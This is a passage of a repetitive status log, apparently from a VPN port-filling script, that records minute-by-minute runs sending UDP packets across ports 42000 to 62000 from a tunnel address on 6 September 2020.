52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:09:05 -Starting port fill at 2020-09-06 15:10:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:10:04 -Starting port fill at 2020-09-06 15:11:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:11:06 -Starting port fill at 2020-09-06 15:12:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:12:05 -Starting port fill at 2020-09-06 15:13:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 15:13:07 -Starting port fill at 2020-09-06 15:14:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:14:06 -Starting port fill at 2020-09-06 15:15:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:15:05 -Starting port fill at 2020-09-06 15:16:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:16:05 -Starting port fill at 2020-09-06 15:17:02 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:17:05 -Starting port fill at 2020-09-06 15:18:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:18:04 -Starting port fill at 2020-09-06 15:19:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:19:05 -Starting port fill at 2020-09-06 15:20:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:20:05 -Starting port fill at 2020-09-06 15:21:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:21:04 -Starting port fill at 2020-09-06 15:22:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:22:04 -Starting port fill at 2020-09-06 15:23:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:23:05 -Starting port fill at 2020-09-06 15:24:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:24:04 -Starting port fill at 2020-09-06 15:25:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:25:04 -Starting port fill at 2020-09-06 15:26:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:26:06 -Starting port fill at 2020-09-06 15:27:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:27:05 -Starting port fill at 2020-09-06 15:28:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:28:04 -Starting port fill at 2020-09-06 15:29:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:29:05 -Starting port fill at 2020-09-06 15:30:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 